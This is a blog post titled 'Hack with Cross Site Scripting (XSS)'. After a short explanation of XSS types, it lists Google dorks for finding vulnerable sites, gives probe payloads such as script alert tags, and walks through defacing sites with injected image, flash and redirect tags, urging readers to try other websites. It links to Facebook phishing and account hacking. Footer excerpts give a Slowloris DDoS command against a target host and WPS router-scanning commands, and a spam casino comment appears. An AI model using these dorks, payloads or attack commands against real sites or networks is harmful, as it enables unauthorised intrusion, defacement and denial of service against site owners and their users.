Pular para o conteúdo principal

Hack with Cross Site Scripting (XSS)

Before hacking with Cross Site Scripting (XSS), lets first learn about what is XSS?

What is XSS?

Inserting malicious client side script into the web applications, and retrieving the scripts appearing to be coming from a trusted source (server) is termed as cross site scripting. XSS differs from other web attack vectors (e.g., SQL injections), in that it does not directly target the application itself. Instead, the users of the web application are the ones at risk.
Cross site scripting (XSS) is a type of computer security vulnerability which is typically found in Web applications, such as web browsers through breaches found in browser security, that enables attackers to inject client-side script into Web pages viewed by other users.

Types of XSS

  1. Reflected XSS (Non-Persistent)
  2. Stored XSS (Persistent)
  3. DOM XSS
Let’s get the meaning of shown XSS types one by one in brief description.

1- Reflected XSS (Non-Persistent)

The non-persistent XSS are actually the most common vulnerabilities that can be found on the internet ironically everywhere. It is named as “non-persistent” because it works on an immediate HTTP response from the victim website, it show up when the webpage get the data provided by the attacker’s client to automatically generate a result page for the attackers himself. Standing on this the attacker could provide some malicious code and try to make the server execute it in order to obtain some result.
Reflected XSS involves the reflecting of a malicious script off of a web application, onto a user’s browser. The script is embedded into a link, and is only activated once that link is clicked on.
The most common applying of this kind of vulnerability is in Search engines in website. The attacker writes some arbitrary HTML code in the search textbox and, if the website is vulnerable, the result page will return the result of these HTML entities.

Stored XSS (Persistent)

The persistent (or storedXSS vulnerability is a more devastating variant of a cross-site scripting flaw, it occurs when the data provided by the attacker is saved by the server, and then permanently displayed on “normal” pages returned to other users in the course of regular browsing, without proper HTML escaping.
Persistent XSS is the more damaging of the two. It occurs when a malicious script is injected directly into a vulnerable web application.

To successfully execute a stored XSS attack, a perpetrator has to locate a vulnerability in a web application and then inject malicious script into its server (e.g., via a comment field).
sorted-XSS

Are you interested to learn how to hack Facebook account through phishing attacks then, click here.

Google Dorks:

inurl:”.php?cmd=”
inurl:”.php?z=”
inurl:”.php?q=”
inurl:”.php?search=”
inurl:”.php?query=”
inurl:”.php?searchstring=”
inurl:”.php?keyword=”
inurl:”.php?file=”
inurl:”.php?years=”
inurl:”.php?txt=”
inurl:”.php?tag=”
inurl:”.php?max=”
inurl:”.php?from=”
inurl:”.php?author=”
inurl:”.php?pass=”
inurl:”.php?feedback=”
inurl:”.php?mail=”
inurl:”.php?cat=”
inurl:”.php?vote=”
inurl:search.php?q=
inurl:com_feedpostold/feedpost.php?url=
inurl:scrapbook.php?id=
inurl:headersearch.php?sid=
inurl:/poll/default.asp?catid=
inurl:/search_results.php?search=
These are some basic dorks but you can make your own custom dorks to find websites.
Using such dorks you can easily find which sites are vulnerable to XSS so you can bypass the filtration.
Basics of XSS:
To start the learning step by step lets get hands dirty by some actual methods, the most common used XSS
injection is :
<script>alert(“Kamran”)</script>
This will alert a popup message, saying “Kamran” without quotes. So,use “search.php?q=” and you can simple try the following on a websi
http://website.com/search.php?q=<script>alert(“Kamran”)</script>
There are chances to get first attempt on XSS vulnerable websites without being failed but chances could go wrong so don’t worry and try some other websites.
Most of the cases occur when java script does not work so use HTML tags e.g
http://website.com/search.php?q=<br><br><b><u>kamran</u></b>
In such case if you see the bold text on the page and newlines then you know its vulnerable and could easily be exploited.
When you enter the java script command or HTML tag you can witness whether the site is vulnerable or not. When you enter <h1>TEST</h1> in search bars or in any available bar and the page in return display the TEST so the site is vulnerable.
Replace the word XSS in java script tag with anyother name because most of the sites catch the word XSS.

Hack Facebook or other social mdia account through Base64 Encoding then,click here.

How to deface website with XSS?

To this point I hope you people have got enough information about XSS and how it works.
Lets use some tricks to deface the site after finding that the site is vulnerable at all. Well there are many methods to deface the site, here I’m giving you a demo in which I’m using <img> tag of html. The image tag is used for displaying image on the website.
For example:
<html>
<body>
<IMG SRC=”http://website.com/image.png”>
</body>
</html>
Now if you change the link to a valid picture link, and save it and run it you will see what i mean. Right now say you have found a comment box, search bar or anything that shows your data after you submitted it you could insert the following to make the picture display on the page.
<IMG SRC=”http://scriptphp.net/wp-content/uploads/2016/04/PHP-Search-engine-script.jpg”>
The other tags are not needed has the page will already have them. Ok it helps to
make your picture big so it stands out and its clear the site got hacked. Another method is using FLASH videos, its the same has the method below but a more stylish deface.
<EMBED SRC=”http://site.com/xss.swf” >
That will execute the flash video linked to it. Or maybe using a pop or redirection as :
<script>window.open( “http://www.xyz.com/” )</script>
Beside this there are many others ways that you can found using Google. My work was to give you the basic concept to make you understand what all about XSS is.
Lets find the network vulnerabilities through which you might get hacked, click here.

Your comments would be highly appreciated.

Comentários

  1. Casino Bonus Codes 2021 | Claim $100 No Deposit
    We have 태평양 먹튀 listed the best no 메이저 벳 먹튀 deposit casinos for bonuses, casino bonuses and no deposit 골드머니 bonus codes, just for you to test out the 크레이지 슬롯 online 골든 리치 casino

    ResponderExcluir

Postar um comentário

Postagens mais visitadas deste blog

Realizar DDos Attack usando Slowloris

Salve esse arquivo como "slowloris.pl". Download do script. http://pastebin.com/2M4ZAHpz Abra o terminal e siga os seguintes comandos:   cd Desktop                    ( o local deve ser substituído pelo local do arquivo, nesse caso se encontra no Desktop ) chmod +x slowloris.pl perl ./slowloris.pl -dns www.target.com -port 80 -timeout 1 -num 1000 -cache 1- Substitua a URL pelo endereço do alvo. 2- Nesse caso será disparado 1000 pacotes a cada 1 segundo.

WiFiPhisher - Ataques Automatizados de Phishing Contra Redes Wi-Fi

Um pesquisador de segurança grego, chamado George Chatzisofroniou, desenvolveu uma ferramenta de engenharia social WiFi que é projetado para roubar credenciais de usuários de redes Wi-Fi segura. A ferramenta, batizada WiFiPhisher, foi lançado no site do desenvolvimento de software GitHub no domingo e está disponível gratuitamente para os usuários.   "É um ataque de engenharia social que não usa força bruta, em contraste com outros métodos. É uma maneira fácil de obter senhas WPA", disse George Chatzisofroniou. No entanto, existem várias ferramentas de hacker disponíveis na Internet que pode cortar de uma rede Wi-Fi segura, mas esta ferramenta automatiza múltipla Wi-Fi técnicas que o tornam um pouco diferente dos outros hackers. Ferramenta WiFiPhisher usa ataque "gêmeo do mal " cenário. O mesmo que o gêmeo do mal, a ferramenta cria primeiro um ponto de acesso sem fio falso (AP) mascarar-se como o legítimo Wi-Fi AP. Em seguida, ele dirige uma negação de

Como encontrar a WPS Routers Habilitados - Kali Linux

Como você poderia encontrar WPS Routers ativado?  Sério é muito fácil de encontrar WPS habilitado roteadores, mas depois que eu postei o meu tutorial sobre como cortar o WPA / WPA2 WiFi Protected muitos povos me enviado mensagens para saber como eles poderiam encontrar WPS habilitado router? por isso é muito simples e limitado a um comando único sim, vamos usar o comando de lavagem para esse fim. O comando que podemos utilizar para encontrar WPS habilitado roteadores está abaixo. wash -i mon0 -C Tenha em mente que o "C" neste alfabeto "C" deve ser a capital Também tenha em mente antes de entrar este comando por favor ligar o interface de moniter ou este comando não funciona mais assim para que você moniter tipo de interface o comando abaixo primeiro e depois tentar digitalizar routers WPS habilitados. airmon-ng start wlan0  Agora isso vai lhe dar todos os roteadores que possuem botão WPS / push ativado em cima delas e você pode tentar cortar-lhes a seu p